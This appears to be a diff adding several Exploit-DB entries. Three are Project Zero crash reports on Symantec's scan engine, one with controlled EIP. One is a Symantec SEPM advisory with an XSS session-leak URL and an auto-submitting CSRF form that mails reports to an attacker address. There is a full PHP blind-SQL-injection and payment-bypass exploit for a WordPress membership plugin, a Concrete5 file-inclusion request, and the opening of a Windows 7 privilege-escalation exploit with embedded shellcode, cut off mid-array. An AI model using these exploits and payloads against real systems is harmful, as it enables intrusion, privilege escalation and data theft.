+.text:000227BB 89 85 68 FF FF+                mov     [ebp+var_98], eax
+.text:000227C1 8B 83 CC FF FF+                mov     eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
+.text:000227C7 89 44 24 04                    mov     [esp+4], eax
+.text:000227CB 8B 85 68 FF FF+                mov     eax, [ebp+var_98]
+.text:000227D1 C1 E0 02                       shl     eax, 2
+.text:000227D4 89 04 24                       mov     [esp], eax
+.text:000227D7 89 95 5C FF FF+                mov     [ebp+src], edx
+.text:000227DD 89 8D 58 FF FF+                mov     [ebp+var_A8], ecx
+.text:000227E3 E8 54 22 FE FF                 call    __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)
+
+That's (count + 1) * 4, without any checking that will succeed. The attached testcase reaches this code on Symantec Scan Engine, I'm not sure which other products use this code.
+
+(gdb) bt
+#1  0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
+#2  0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
+#3  0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
+#4  0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
+#5  0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
+#6  0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
+#7  0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) () 
+#8  0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40035.zip
+
diff --git a/platforms/multiple/dos/40036.txt b/platforms/multiple/dos/40036.txt
new file mode 100755
index 000000000..371ab8ea9
--- /dev/null
+++ b/platforms/multiple/dos/40036.txt
@@ -0,0 +1,56 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821
+
+A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives. 
+
+The routine uses a 16bit value read from the file to index a 256 element array without any bounds checking, the attached testcase should demonstrate this reliably. I have verified this on the following products:
+
+    Norton Antivirus, Windows
+    Symantec Endpoint Protection, Linux and Windows
+    Symantec Scan Engine, Linux and Windows
+
+
+(534.700): Access violation - code c0000005 (!!! second chance !!!)
+eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
+eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+ccScanw!filelengthi64+0x3af63:
+6ba47ec3 66399445fcbfffff cmp     word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
+0:071> ub
+ccScanw!filelengthi64+0x3af3f:
+6ba47e9f 8bb5ec7fffff    mov     esi,dword ptr [ebp-8014h]
+6ba47ea5 8bc7            mov     eax,edi
+6ba47ea7 8985e07fffff    mov     dword ptr [ebp-8020h],eax
+6ba47ead e96d010000      jmp     ccScanw!filelengthi64+0x3b0bf (6ba4801f)
+6ba47eb2 0fbfc3          movsx   eax,bx
+6ba47eb5 ba00200000      mov     edx,2000h
+6ba47eba 8dbdfb9fffff    lea     edi,[ebp-6005h]
+6ba47ec0 0fb7cb          movzx   ecx,bx
+0:071> lmv m ccScanw
+start    end        module name
+6b930000 6bb5f000   ccScanw    (export symbols)       C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Image name: ccScanw.dll
+    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
+    CheckSum:         0022B3ED
+    ImageSize:        0022F000
+    File version:     13.1.2.19
+    Product version:  13.1.2.19
+    File flags:       0 (Mask 3F)
+    File OS:          40004 NT Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0409.04b0
+    CompanyName:      Symantec Corporation
+    ProductName:      Symantec Security Technologies
+    InternalName:     ccScan
+    OriginalFilename: CCSCAN.DLL
+    ProductVersion:   13.1.2.19
+    FileVersion:      13.1.2.19
+    FileDescription:  Symantec Scan Engine
+    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40036.zip
+
diff --git a/platforms/multiple/dos/40037.txt b/platforms/multiple/dos/40037.txt
new file mode 100755
index 000000000..52481f29f
--- /dev/null
+++ b/platforms/multiple/dos/40037.txt
@@ -0,0 +1,85 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823
+
+A PowerPoint PPT file is a complicated OLE compound document comprising of a series of streams. The format is described by Microsoft in [MS-PPT].
+
+https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx
+
+Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.
+
+For example, a read request that can be satisfied from the stream cache in these ways:
+
+
++-------------------------+
+|        CACHE            |
++-------------------------+
+
+1.              <--------->   Non-zero offset, but entire cache needed.
+2. <------>                   Zero offset, but not the entire cache.
+3. <---------------------->   Entire cache.
+4.         <---->             Non-zero offset and not entire cache.
+
+All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a powerpoint file with a series of records that massage the cache with a series of records, we can trigger a stack buffer overflow of attacker controlled data.
+
+The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.
+
+Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.
+
+0:065> g
+(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
+eip=41414141 esp=056df558 ebp=00000000 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+41414141 ??              ???
+0:065> lmv m ccScanW
+start    end        module name
+65820000 65a4f000   ccScanw    (deferred)             
+    Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
+    Image name: ccScanw.dll
+    Timestamp:        Tue Jan 26 13:51:55 2016 (56A7EA7B)
+    CheckSum:         0022B3ED
+    ImageSize:        0022F000
+    File version:     13.1.2.19
+    Product version:  13.1.2.19
+    File flags:       0 (Mask 3F)
+    File OS:          40004 NT Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0409.04b0
+    CompanyName:      Symantec Corporation
+    ProductName:      Symantec Security Technologies
+    InternalName:     ccScan
+    OriginalFilename: CCSCAN.DLL
+    ProductVersion:   13.1.2.19
+    FileVersion:      13.1.2.19
+    FileDescription:  Symantec Scan Engine
+    LegalCopyright:   Copyright (c) 2015 Symantec Corporation. All rights reserved.
+
+
+The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
+
+I verified this bug exists on the following products:
+
+* Norton Antivirus (All Platforms)
+* Symantec Endpoint (All Platforms)
+* Symantec Scan Engine (All Platforms)
+* Symantec Email Security (All Platforms)
+
+And probably all other Symantec and Norton branded products.
+
+
+NOTES:
+
+PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:
+
+int PPFindRecSet(tagSS_STREAM *stream,
+                 unsigned StartOffset,
+                 unsigned EndOffset,
+                 short count,
+                 short *RequiredRecordTypes,
+                 unsigned *RecordOffsets,
+                 int *RecordLengths);
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40037.zip
+
diff --git a/platforms/php/webapps/40041.txt b/platforms/php/webapps/40041.txt
new file mode 100755
index 000000000..848d17473
--- /dev/null
+++ b/platforms/php/webapps/40041.txt
@@ -0,0 +1,187 @@
+[+] Credits: John Page aka HYP3RLINX
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
+
+[+] ISR: ApparitionSec
+
+
+Vendor:
+================
+www.symantec.com
+
+
+Product:
+===========
+SEPM
+Symantec Endpoint Protection Manager and client v12.1
+
+SEPM provides a centrally managed solution. It handles security policy
+enforcement, host integrity checking (Symantec Network Access Control only),
+and automated remediation over all clients. The policies functionality is
+the heart of the Symantec software. Clients connect to the server to get the
+latest policies, security settings, and software updates.
+
+
+Vulnerability Type(s):
+======================
+Multiple Cross Site Scripting (XSS)
+Cross Site Request Forgeries (CSRF)
+Open Redirect
+
+
+CVE Reference(s):
+=================
+CVE-2016-3652 / XSS
+CVE-2016-3653 / CSRF
+CVE-2016-5304 / Open Redirect
+
+
+Vulnerability Details:
+=====================
+
+The management console for SEPM contains a number of security
+vulnerabilities that could be used by a lower-privileged user or by
+an unauthorized user to elevate privilege or gain access to unauthorized
+information on the management server. Exploitation attempts of
+these vulnerabilities requires access to the SEP Management console.
+
+
+References:
+============
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
+
+
+Exploit code(s):
+===============
+
+In this case XSS can bypass the "http-only" cookie protection because the
+SEPM application writes and stores the session ID within various
+javascript functions used by the application within the DOM thereby
+exposing them directly to the XSS attack.
+
+1) createModalDialogFromURL
+2) createWindowFromURL
+3) createWindowFromForm
+4) createIEWindowFromForm
+
+So all we need to do is alert(createModalDialogFromURL) anyone one of them
+(functions) an it will leak the session ID essentially throwing the
+HttpOnly secure cookie protection flag into the garbage.
+
+e.g.
+
+XSS POC Defeat http-only flag and access PHPSESSID:
+
+https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
+
+
+
+Open Redirect in external URL .php script:
+=========================================
+
+A reporting URL used to route generated reports externally to any
+authorized URL is susceptible to an open redirect vulnerability
+that could have allowed an authorized but less-privileged user to redirect
+an unsuspecting privileged user to an external URL to
+attempt further exploitation, e.g. phishing.
+
+
+If a victim clicks on a link supplied by an attacker
+
+e.g.
+
+https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
+
+
+
+Cross Site Request Forgery (CSRF):
+==================================
+
+Multiple Cross Site Request Forgery exists in couple of places within this
+version of SEPM below is an example of sending scheduled report to
+an remote attackers email, if current logged in user visits malicious
+webpage or clicks infected link etc...
+
+
+Symantec Reporting Admin CSRF POC:
+
+<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
+method="POST" />
+<input type="hidden" name="ReportName" value="HELL" />
+<input type="hidden" name="Description" value="PWNED!" />
+<input type="hidden" name="DisableReportSchedule" value="on" />
+<input type="hidden" name="NewReport" value="Y" />
+<input type="hidden" name="reporttype" value="1" />
+<input type="hidden" name="FILTERNAME" value="Default" />
+<input type="hidden" name="runEvery" value="1" />
+<input type="hidden" name="repeat" value="weekly" />
+<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
+<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
+<input type="hidden" name="filHourSchedule" value="16" />
+<input type="hidden" name="Schedulehour" value="16" />
+<input type="hidden" name="filMinSchedule" value="56" />
+<input type="hidden" name="Scheduleminute" value="56" />
+<input type="hidden" name="sysadmin" value="off" />
+<input type="hidden" name="sendto" value="evil@abyss.com" />
+<input type="hidden" name="updatelastrun" value="0" />
+<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
+<input type="hidden" name="ReportPrefix" value="Y" />
+<input type="hidden" name="report_idx" value="Y-0" />
+<script>document.getElementById('PWN').submit()</script>
+</form>
+
+
+Disclosure Timeline:
+============================================
+Vendor Notification: Febuary 11, 2016
+Vendor Acknowledges Report: Febuary 12, 2016
+Vendor Releases Fix: June 28, 2016
+June 29, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level(s):
+====================
+Cross Site Scripting
+Medium
+v2 6.8
+AV:A/AC:M/Au:S/C:C/I:C/A:N
+v3 6.7
+AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
+
+Cross Site Request Forgery
+High
+v2 7.0
+AV:A/AC:M/Au:M/C:C/I:C/A:C
+v3 7.1
+AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+
+Open Redirect
+Medium
+v2 4.1
+AV:A/AC:L/Au:S/C:P/I:P/A:N
+v3 4.1
+AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
diff --git a/platforms/php/webapps/40042.php b/platforms/php/webapps/40042.php
new file mode 100755
index 000000000..742f45d5d
--- /dev/null
+++ b/platforms/php/webapps/40042.php
@@ -0,0 +1,173 @@
+<?php
+/**
+ * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
+ * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ...  inurl:"lid=100" "Register" "Confirm Password"
+ * Exploit Author: wp0Day.com <contact@wp0day.com>
+ * Vendor Homepage: http://wpindeed.com/
+ * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
+ * Version: 3.3
+ * Tested on: Debian 8, PHP 5.6.17-3
+ * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
+ * Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
+ */
+
+
+require_once('curl.php');
+//OR
+//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
+$curl = new CurlWrapper();
+
+
+$options = getopt("t:m:l:e:s:",array('tor:'));
+print_r($options);
+$options = validateInput($options);
+
+if (!$options){
+    showHelp();
+}
+
+if ($options['tor'] === true)
+{
+    echo " ### USING TOR ###\n";
+    echo "Setting TOR Proxy...\n";
+    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
+    $curl->addOption(CURLOPT_PROXYTYPE,7);
+    echo "Checking IPv4 Address\n";
+    $curl->get('https://dynamicdns.park-your-domain.com/getip');
+    echo "Got IP : ".$curl->getResponse()."\n";
+    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
+    $answer = fgets(fopen ("php://stdin","r"));
+    if(trim($answer) != 'wololo'){
+        die("Aborting!\n");
+    }
+    echo "OK...\n";
+}
+
+function isTrue($sql){
+    global $curl, $options;
+    $levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
+    $data = array(
+        'action'=>'ihc_preview_user_listing',
+        'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
+    );
+    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
+    $resp = $curl->getResponse();
+    return preg_match('~ihc_public_list_users_(\d+)~',$resp);
+}
+
+function exploit(){
+    global $curl, $options;
+
+    if ($options['m'] == 'pay'){
+        $level = $options['l'];
+        for($i=$options['s']; $i<$options['e']; $i++){
+            //This is mental, no IP or Hash check!
+            echo "Paying Level $level to UserID: $i\n";
+            $data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
+            $curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
+            //echo $curl->getResponse();
+        }
+    }
+    if ($options['m'] == 'sql'){
+        $query = $options['s'];
+        echo "'Running' SQL Query: $query\n";
+        echo "Getting Length";
+        $max_length = 100;
+        //Well, it is messed up, can use , (comma) in the query
+        //Binary search or divide et impera is possible with the BETWEEN operator
+        //Code it yourself :)
+        $len = 0;
+        for ($i=1;$i<$max_length;$i++){
+            $sql_len = "(select char_length( ($query) ) = $i )";
+            if (isTrue($sql_len)){
+                echo "\nLength found: $i\n";
+                $len = $i;
+                break;
+            } else {
+                echo ".";
+            }
+        }
+        if ($len !== 0 ){
+            echo "Reading char by char\nResponse:\n";
+        } else {
+            die("Failed getting length!\nAboring.\n\n");
+        }
+        $charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
+        for ($i=1;$i<$len;$i++){
+            $got = false;
+            for ($j=0;$j<strlen($charset);$j++){
+                $chr = $charset[$j];
+                $question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
+                if (isTrue($question)){
+                    echo $charset[$j];
+                    $got = true;
+                    break;
+                }
+            }
+            if (!$got){
+                echo "?";
+            }
+        }
+        echo "\n\n";
+
+    }
+}
+
+exploit();
+
+function validateInput($options){
+
+    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
+        return false;
+    }
+
+    if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
+        return false;
+    }
+    if ($options['m'] == 'sql' && !isset($options['s'])) {
+        return false;
+    }
+
+    if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
+        return false;
+    }
+    if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
+        echo "In pay mode -s -e and -l must be numeric!\n";
+        return false;
+    }
+
+    $options['tor'] = isset($options['tor']);
+
+    return $options;
+}
+
+
+function showHelp(){
+    global $argv;
+    $help = <<<EOD
+
+     Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
+
+
+Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
+
+       [MODE] sql  - Blind SQL Inject mode*
+              pay  - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
+
+       *Note: You can't use , (comma) in the query.
+
+Examples:
+       php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
+       php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1
+
+       Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
+
+    Misc:
+           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
+           @link http://github.com/svyatov/CurlWrapper
+           @license http://www.opensource.org/licenses/mit-license.html MIT License
+
+EOD;
+    echo $help."\n\n";
+    die();
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/40045.txt b/platforms/php/webapps/40045.txt
new file mode 100755
index 000000000..1776ed1f5
--- /dev/null
+++ b/platforms/php/webapps/40045.txt
@@ -0,0 +1,88 @@
+-------------------------------------------------------------------------------
+Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
+-------------------------------------------------------------------------------
+
+
+[-] Software Link:
+
+https://www.concrete5.org/
+
+
+[-] Affected Versions:
+
+Version 5.7.3.1 and probably other versions.
+
+
+[-] Vulnerability Description:
+
+The vulnerable code is located within the "Application::dispatch()" method:
+
+326.	public function dispatch(Request $request)
+327.	{
+328.	    if ($this->installed) {
+329.	        $response = $this->getEarlyDispatchResponse();
+330.	    }
+331.	    if (!isset($response)) {
+332.	        $collection = Route::getList();
+333.	        $context = new \Symfony\Component\Routing\RequestContext();
+334.	        $context->fromRequest($request);
+335.	        $matcher = new UrlMatcher($collection, $context);
+336.	        $path = rtrim($request->getPathInfo(), '/') . '/';
+337.	        try {
+338.	            $request->attributes->add($matcher->match($path));
+339.	            $matched = $matcher->match($path);
+340.	            $route = $collection->get($matched['_route']);
+341.	            Route::setRequest($request);
+342.	            $response = Route::execute($route, $matched);
+
+The vulnerability exists because the path for the incoming request is retrieved using the
+"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
+for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
+be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
+encoding and path normalization done by the web server. This could be exploited by unauthenticated
+attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
+Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
+by sending an HTTP request like this:
+
+GET /concrete5/index.php HTTP/1.1
+Host: localhost
+X-Original-Url: /tools/../../index
+Connection: keep-alive
+
+The dispatching process for this request will try to re-include the index.php file,
+and this will end up with an unexpected error.
+
+
+[-] Solution:
+
+Update to a fixed version.
+
+
+[-] Disclosure Timeline:
+
+[05/05/2015] - Vulnerability details sent through HackerOne
+[02/10/2015] - CVE number requested
+[19/12/2015] - Vulnerability fixed on the GitHub repository
+[26/06/2016] - Vulnerability publicly disclosed on HackerOne
+[28/06/2016] - Publication of this advisory
+
+
+[-] CVE Reference:
+
+The Common Vulnerabilities and Exposures project (cve.mitre.org)
+has not assigned a CVE identifier for this vulnerability.
+
+
+[-] Credits:
+
+Vulnerability discovered by Egidio Romano.
+
+
+[-] Original Advisory:
+
+http://karmainsecurity.com/KIS-2016-10
+
+
+[-] Other References:
+
+https://hackerone.com/reports/59665
\ No newline at end of file
diff --git a/platforms/win32/local/40039.cpp b/platforms/win32/local/40039.cpp
new file mode 100755
index 000000000..e1a8d087f
--- /dev/null
+++ b/platforms/win32/local/40039.cpp
@@ -0,0 +1,389 @@
+/* 
+# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
+# Date: 28/06-2016
+# Exploit Author: @blomster81
+# Vendor Homepage: www.microsoft.com
+# Version: Windows 7 SP1 x86
+# Tested on: Windows 7 SP1 x86
+# CVE : 2016-0400
+
+MS16-014 EoP PoC created from 
+https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
+Spawns CMD.exe with SYSTEM rights. 
+Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
+
+********* EDB Note *********
+
+ntos.h is available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip
+
+***************************
+
+*/
+
+#include "stdafx.h"
+#include <Windows.h>
+#include <winioctl.h>
+#include "ntos.h"
+#include <TlHelp32.h>
+
+
+typedef union {
+	HANDLE Handle;
+	ULONG64 Handle64;
+	ULONG32 Handle32;
+}
+HANDLE3264, *PHANDLE3264;
+
+typedef struct {
+	ULONG HandleCount;
+	ULONG Action;
+	HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
+	HANDLE3264 UserModeProcess;
+	HANDLE3264 Handles[20];
+}
+WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
+
+#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
+
+typedef struct {
+	IN VOID * ObjectAttributes;
+	IN ACCESS_MASK DesiredAccess;
+
+	OUT HANDLE3264 Handle;
+}
+WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
+
+typedef enum _KPROFILE_SOURCE {
+	ProfileTime,
+	ProfileAlignmentFixup,
+	ProfileTotalIssues,
+	ProfilePipelineDry,
+	ProfileLoadInstructions,
+	ProfilePipelineFrozen,
+	ProfileBranchInstructions,
+	ProfileTotalNonissues,
+	ProfileDcacheMisses,
+	ProfileIcacheMisses,
+	ProfileCacheMisses,
+	ProfileBranchMispredictions,
+	ProfileStoreInstructions,
+	ProfileFpInstructions,
+	ProfileIntegerInstructions,
+	Profile2Issue,
+	Profile3Issue,
+	Profile4Issue,
+	ProfileSpecialInstructions,
+	ProfileTotalCycles,
+	ProfileIcacheIssues,
+	ProfileDcacheAccesses,
+	ProfileMemoryBarrierCycles,
+	ProfileLoadLinkedIssues,
+	ProfileMaximum
+
+} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
+
+typedef struct _DESKTOPINFO
+{
+	/* 000 */ PVOID        pvDesktopBase;
+	/* 008 */ PVOID        pvDesktopLimit;
+
+} DESKTOPINFO, *PDESKTOPINFO;
+
+
+typedef struct _CLIENTINFO
+{
+	/* 000 */ DWORD             CI_flags;
+	/* 004 */ DWORD             cSpins;
+	/* 008 */ DWORD             dwExpWinVer;
+	/* 00c */ DWORD             dwCompatFlags;
+	/* 010 */ DWORD             dwCompatFlags2;
+	/* 014 */ DWORD             dwTIFlags;
+	/* 018 */ DWORD				filler1;
+	/* 01c */ DWORD				filler2;
+	/* 020 */ PDESKTOPINFO      pDeskInfo;
+	/* 028 */ ULONG_PTR         ulClientDelta;
+
+} CLIENTINFO, *PCLIENTINFO;
+
+typedef struct _HANDLEENTRY {
+	PVOID  phead;
+	ULONG_PTR  pOwner;
+	BYTE  bType;
+	BYTE  bFlags;
+	WORD  wUniq;
+}HANDLEENTRY, *PHANDLEENTRY;
+
+typedef struct _SERVERINFO {
+	DWORD dwSRVIFlags;
+	DWORD64 cHandleEntries;
+	WORD wSRVIFlags;
+	WORD wRIPPID;
+	WORD wRIPError;
+}SERVERINFO, *PSERVERINFO;
+
+typedef struct _SHAREDINFO {
+	PSERVERINFO psi;
+	PHANDLEENTRY aheList;
+	ULONG HeEntrySize;
+	ULONG_PTR pDispInfo;
+	ULONG_PTR ulSharedDelta;
+	ULONG_PTR awmControl;
+	ULONG_PTR DefWindowMsgs;
+	ULONG_PTR DefWindowSpecMsgs;
+}SHAREDINFO, *PSHAREDINFO;
+
+#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
+
+typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
+typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
+
+DWORD g_HalDispatchTable = 0;
+void* kHandle;
+HWND g_window = NULL;
+const WCHAR g_windowClassName[] = L"Victim_Window";
+WNDCLASSEX wc;
+PSHAREDINFO g_pSharedInfo;
+PSERVERINFO g_pServerInfo;
+HANDLEENTRY* g_UserHandleTable;
+
+LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
+{
+	return DefWindowProc(hwnd, uMsg, wParam, lParam);
+}
+
+DWORD getProcessId(wchar_t* str)
+{
+	HANDLE hProcessSnap;
+	PROCESSENTRY32 pe32;
+	DWORD PID;
+
+	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (hProcessSnap == INVALID_HANDLE_VALUE)
+	{
+		return 0;
+	}
+
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+	if (!Process32First(hProcessSnap, &pe32))
+	{
+		CloseHandle(hProcessSnap);
+		return 0;
+	}
+
+	do
+	{
+		if (!wcscmp(pe32.szExeFile, str))
+		{
+			wprintf(L"Process: %s found\n", pe32.szExeFile);
+			PID = pe32.th32ProcessID;
+			return PID;
+		}
+	} while (Process32Next(hProcessSnap, &pe32));
+	return 0;
+}
+
+void Launch()
+{
+	void* pMem;
+	char shellcode[] =
+		"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
+		"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
+		"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
+		"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
+		"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
+		"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
+		"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
+		"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
+		"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
+		"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
+		"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
+		"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
